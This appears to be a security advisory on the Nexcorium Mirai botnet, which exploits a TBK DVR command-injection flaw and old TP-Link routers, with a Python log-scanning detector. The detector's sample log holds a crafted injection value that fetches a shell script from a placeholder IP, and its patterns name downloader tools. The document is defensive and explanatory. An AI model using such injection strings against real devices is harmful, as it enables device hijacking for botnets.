Nexcorium Mirai Variant Exploits CVE-2024-3721 in TBK DVR Botnet
- Immediate impact: Threat actors are actively hijacking TBK DVRs and TP-Link routers to expand the capacity of a distributed denial-of-service botnet.
- Affected systems: The vulnerabilities impact TBK DVR devices and various end-of-life TP-Link Wi-Fi routers that no longer receive security updates.
- Remediation: Administrators must replace end-of-life hardware and ensure TBK DVR firmware is updated or that the devices are isolated from public internet access.
Overview of the Nexcorium Botnet Campaign
A new Mirai variant identified as Nexcorium is actively targeting Internet of Things (IoT) devices to facilitate large-scale DDoS attacks. According to reporting by The Hacker News, which cites findings from Fortinet FortiGuard Labs and Palo Alto Networks Unit 42, the campaign focuses on exploiting a command injection vulnerability in TBK DVR systems.
The emergence of Nexcorium demonstrates the persistent utility of the leaked Mirai source code in today's threat landscape. By leveraging known vulnerabilities in unpatched or end-of-life (EoL) hardware, attackers can rapidly scale their infrastructure. This campaign highlights the risks of legacy hardware that remains connected to the public internet without adequate defensive measures or vendor support.
Technical Analysis: TBK DVR Command Injection Vulnerability
The primary vector for this campaign is CVE-2024-3721, a medium-severity command injection vulnerability affecting TBK DVR devices. The vulnerability allows a remote, unauthenticated attacker to execute arbitrary system commands by sending specially crafted HTTP requests to the device.
Once the attacker gains a foothold via the command injection, the Nexcorium binary is downloaded and executed. This binary is a variant of the Mirai malware, modified to include updated C2 communication protocols and a broader array of DDoS attack vectors. Beyond TBK DVRs, the threat actors are also targeting various EoL TP-Link Wi-Fi routers. These devices often contain unpatched RCE flaws that are trivial to exploit with automated scanning tools. Because these routers are no longer supported by the manufacturer, such flaws will never be fixed; they represent a permanent zero-day risk for as long as the devices remain in service.
Characterizing Nexcorium TTPs
The TTPs used by the Nexcorium operators follow the standard pattern for botnet propagation, as described in the MITRE ATT&CK framework. The process typically involves:
- Scanning: Automated scanning of public IP ranges for the specific web interfaces of TBK DVRs and TP-Link routers.
- Exploitation: Delivery of the command injection payload to achieve initial access.
- Payload Delivery: Using shell commands (such as wget or curl) to download the architecture-specific Nexcorium binary from a remote staging server.
- Persistence and Communication: Establishing a connection to the C2 server to receive instructions for launching attacks or scanning for new victims.
Detection and Remediation Strategies
Defenders must prioritize the identification of legacy IoT hardware within their environments. Identifying these devices is the first step in neutralizing the threat posed by Nexcorium. To maintain visibility, security teams should implement logging and monitoring for any unusual outbound traffic originating from DVRs or networking equipment.
How to Detect CVE-2024-3721 Exploitation
To effectively monitor for this threat, organizations should look for specific IoC patterns in web server logs. Monitoring for HTTP POST or GET requests containing shell metacharacters (e.g., ;, |, &) directed at the administrative endpoints of TBK DVRs is a primary detection method; note that standard access logs record only the request line, so metacharacters carried in a POST body are visible only where request bodies are logged (for example at a WAF or reverse proxy). Additionally, SIEM rules should be configured to alert on unauthorized outbound connections from IoT devices to unknown IP addresses on non-standard ports, which may indicate C2 beaconing.
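As an added illustration of the log-based check described above (this is not code from the original article or from the cited researchers), the following Python script parses constructed Combined Log Format lines and flags requests to a DVR admin path that carry URL-decoded shell metacharacters or downloader commands. The path /cgi-bin/dvr_admin and the sample addresses are assumptions, not real TBK DVR endpoints or indicators.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Combined Log Format). The endpoint path
# /cgi-bin/dvr_admin is a placeholder; substitute the real admin paths of the
# DVR model in your environment.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jun/2024:12:00:01 +0000] "GET /cgi-bin/dvr_admin?user=admin HTTP/1.1" 200 512
203.0.113.7 - - [10/Jun/2024:12:00:02 +0000] "GET /cgi-bin/dvr_admin?user=admin%3Bwget%20http%3A%2F%2F198.51.100.9%2Fbot.sh HTTP/1.1" 200 34
203.0.113.8 - - [10/Jun/2024:12:00:03 +0000] "POST /cgi-bin/dvr_admin HTTP/1.1" 200 34
203.0.113.9 - - [10/Jun/2024:12:00:04 +0000] "GET /index.html?q=a|b HTTP/1.1" 200 120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)
ADMIN_PREFIXES = ("/cgi-bin/",)                 # placeholder admin path prefixes
SHELL_META = re.compile(r"[;|&`$]")             # metacharacters named in the text
DOWNLOADERS = re.compile(r"\b(wget|curl|tftp)\b", re.IGNORECASE)


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def score(entry):
    """Return the reasons a request looks like command-injection against an admin endpoint."""
    reasons = []
    path = unquote(entry["path"])               # decode %3B -> ';' etc. before matching
    if not path.startswith(ADMIN_PREFIXES):
        return reasons                          # only admin endpoints are in scope
    if SHELL_META.search(path):
        reasons.append("shell metacharacter in request")
    if DOWNLOADERS.search(path):
        reasons.append("downloader command in request")
    return reasons


def find_suspicious(log_text):
    """Scan a log and return (ip, method, path, reasons) for every flagged request."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = score(entry)
        if reasons:
            hits.append((entry["ip"], entry["method"], entry["path"], reasons))
    return hits
```

Only the request line is inspected, so a POST whose injection sits in the body (line three of the sample) is not flagged here; that case needs body logging at a WAF or reverse proxy.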
Mirai Botnet Nexcorium Variant Mitigation
The most effective mitigation strategy is the immediate decommissioning of EoL TP-Link routers. Since these devices do not receive security updates, they cannot be adequately secured against modern exploits. For TBK DVR systems, administrators should apply the latest firmware updates immediately. If a patch is unavailable, the devices must be placed behind a VPN or a Zero Trust access gateway so they are not directly exposed to the internet. Segregating IoT devices into dedicated VLANs can also limit lateral movement should a device be compromised. Finally, replacing default credentials with complex, unique passwords remains a fundamental step in preventing automated botnet takeovers.